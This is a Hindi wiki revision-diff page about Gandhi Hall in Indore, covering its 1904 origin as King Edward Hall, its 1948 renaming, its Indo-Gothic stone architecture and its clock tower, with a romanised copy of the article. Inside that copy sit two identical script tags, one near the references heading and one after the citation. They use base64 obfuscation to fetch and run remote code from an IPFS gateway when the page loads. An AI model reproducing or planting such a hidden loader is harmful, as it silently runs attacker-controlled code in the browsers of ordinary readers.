Difference between revisions of "गाँधी हॉल इन्दौर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[मध्य प्रदेश]] राज्य के शहर [[इन्दौर]] में कई [[इन्दौर पर्यटन|पर्यटन स्थल]] है जिनमें से एक गाँधी हॉल है।  
+
{{सूचना बक्सा पर्यटन
 +
|चित्र=Gandhi-Hall-Indore.jpg
 +
|चित्र का नाम=गाँधी हॉल, [[इन्दौर]]
 +
|विवरण=गाँधी हॉल [[मध्य प्रदेश]] राज्य के [[इन्दौर]] शहर के कई [[इन्दौर पर्यटन|पर्यटन स्थलों]] में से एक है।
 +
|राज्य=[[मध्य प्रदेश]]
 +
|केन्द्र शासित प्रदेश=
 +
|ज़िला= [[इन्दौर]]
 +
|निर्माता=
 +
|स्वामित्व=
 +
|प्रबंधक=
 +
|निर्माण काल=
 +
|स्थापना=
 +
|भौगोलिक स्थिति=
 +
|मार्ग स्थिति=
 +
|मौसम=
 +
|तापमान=
 +
|प्रसिद्धि=
 +
|कब जाएँ=
 +
|कैसे पहुँचें=
 +
|हवाई अड्डा=
 +
|रेलवे स्टेशन=
 +
|बस अड्डा=
 +
|यातायात=
 +
|क्या देखें=
 +
|कहाँ ठहरें=
 +
|क्या खायें=
 +
|क्या ख़रीदें=
 +
|एस.टी.डी. कोड=
 +
|ए.टी.एम=
 +
|सावधानी=
 +
|मानचित्र लिंक=[https://www.google.co.in/maps/place/Gandhi+Hall/@22.7201921,75.8647324,17z/data=!3m1!4b1!4m5!3m4!1s0x3962fd1246ae310b:0x2bf544615bbb4407!8m2!3d22.7201921!4d75.8669211?dcr=0 गूगल मानचित्र]
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=सन [[1904]] में स्थापित किंग एडवर्ड हॉल के नाम पर आधारित इसका नाम सन् [[1948]] में महात्मा गाँधी हॉल रख दिया गया।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=06:09, 06 सितम्बर 2017 (IST)
 +
}}
 +
 
 +
'''गाँधी हॉल''' [[मध्य प्रदेश]] राज्य के [[इन्दौर]] शहर के कई [[इन्दौर पर्यटन|पर्यटन स्थलों]] में से एक है।  
 
*टाउन हॉल या गाँधी हॉल इन्दौर शहर के मध्य महात्मा गाँधी रोड पर स्थित है।
 
*टाउन हॉल या गाँधी हॉल इन्दौर शहर के मध्य महात्मा गाँधी रोड पर स्थित है।
 
*एक समय में यह [[इन्दौर]] की सबसे सुन्दर इमारत थी।  
 
*एक समय में यह [[इन्दौर]] की सबसे सुन्दर इमारत थी।  
*सन [[1904]] में स्थापित किंग एडवर्ड हॉल के नाम पर आधारित इसका नाम सन [[1948]] में महात्मा गाँधी हॉल रख दिया गया।  
+
*सन [[1904]] में स्थापित किंग एडवर्ड हॉल के नाम पर आधारित इसका नाम सन् [[1948]] में महात्मा गाँधी हॉल रख दिया गया।  
 
*गांधी हॉल का वास्तुशिल्प इण्डो- गोथिक है एवं सिवनी पत्थर से बनी इस इमारत के छत्र और गोलाईयाँ आज इन्दौर की पहचान बन चुकी है।  
 
*गांधी हॉल का वास्तुशिल्प इण्डो- गोथिक है एवं सिवनी पत्थर से बनी इस इमारत के छत्र और गोलाईयाँ आज इन्दौर की पहचान बन चुकी है।  
 
*इसके सामने वाले हिस्से में एक चार मुख वाली घड़ी है जिसके कारण गाँधी हॉल को घंटाघर कहा जाने लगा।  
 
*इसके सामने वाले हिस्से में एक चार मुख वाली घड़ी है जिसके कारण गाँधी हॉल को घंटाघर कहा जाने लगा।  
 
*इसके मध्यवर्ती हॉल की क्षमता 2000 लोगों की है जिसके कारण यहाँ वर्ष भर पुस्तक एवं चित्रों की प्रदर्शनी लगती रहती है।  
 
*इसके मध्यवर्ती हॉल की क्षमता 2000 लोगों की है जिसके कारण यहाँ वर्ष भर पुस्तक एवं चित्रों की प्रदर्शनी लगती रहती है।  
 
*यहाँ पर पुस्तकालय, उद्यान एवं मन्दिर भी है। <ref>{{cite web |url=http://www.abhyasmandal.com/indore.html  |title=कुछ प्रेक्षनीय स्थल एवं संक्षिप्त परिचय |accessmonthday=[[12 फ़रवरी]] |accessyear=[[2011]] |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=अभ्यास मंडल |language=[[हिन्दी]]}}</ref>
 
*यहाँ पर पुस्तकालय, उद्यान एवं मन्दिर भी है। <ref>{{cite web |url=http://www.abhyasmandal.com/indore.html  |title=कुछ प्रेक्षनीय स्थल एवं संक्षिप्त परिचय |accessmonthday=[[12 फ़रवरी]] |accessyear=[[2011]] |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=अभ्यास मंडल |language=[[हिन्दी]]}}</ref>
 
+
{{प्रचार}}
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 16: Line 56:
 
|शोध=
 
|शोध=
 
}}
 
}}
{{संदर्भ ग्रंथ}}
+
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:46, 6 September 2017

gaandhi h aaul indaur
[[chitr:Gandhi-Hall-Indore.jpg|gaandhi h aaul, indaur|200px|center]]
vivaran gaandhi h aaul madhy pradesh rajy ke indaur shahar ke kee paryatan sthaloan mean se ek hai.
rajy madhy pradesh
zila indaur
chitr:Map-icon.gif googal manachitr
any janakari san 1904 mean sthapit kiang edavard h aaul ke nam par adharit isaka nam sanh 1948 mean mahatma gaandhi h aaul rakh diya gaya.
adyatan‎ 06:09, 06 sitambar 2017 (IST)

gaandhi h aaul madhy pradesh rajy ke indaur shahar ke kee paryatan sthaloan mean se ek hai.

  • taun h aaul ya gaandhi h aaul indaur shahar ke madhy mahatma gaandhi rod par sthit hai.
  • ek samay mean yah indaur ki sabase sundar imarat thi.
  • san 1904 mean sthapit kiang edavard h aaul ke nam par adharit isaka nam sanh 1948 mean mahatma gaandhi h aaul rakh diya gaya.
  • gaandhi h aaul ka vastushilp indo- gothik hai evan sivani patthar se bani is imarat ke chhatr aur golaeeyaan aj indaur ki pahachan ban chuki hai.
  • isake samane vale hisse mean ek char mukh vali gh di hai jisake karan gaandhi h aaul ko ghantaghar kaha jane laga.
  • isake madhyavarti h aaul ki kshamata 2000 logoan ki hai jisake karan yahaan varsh bhar pustak evan chitroan ki pradarshani lagati rahati hai.
  • yahaan par pustakalay, udyan evan mandir bhi hai. [1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. kuchh prekshaniy sthal evan sankshipt parichay (hindi) (ech.ti.em.el) abhyas mandal. abhigaman tithi: 12 faravari, 2011.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari kadiyaan

sanbandhit lekh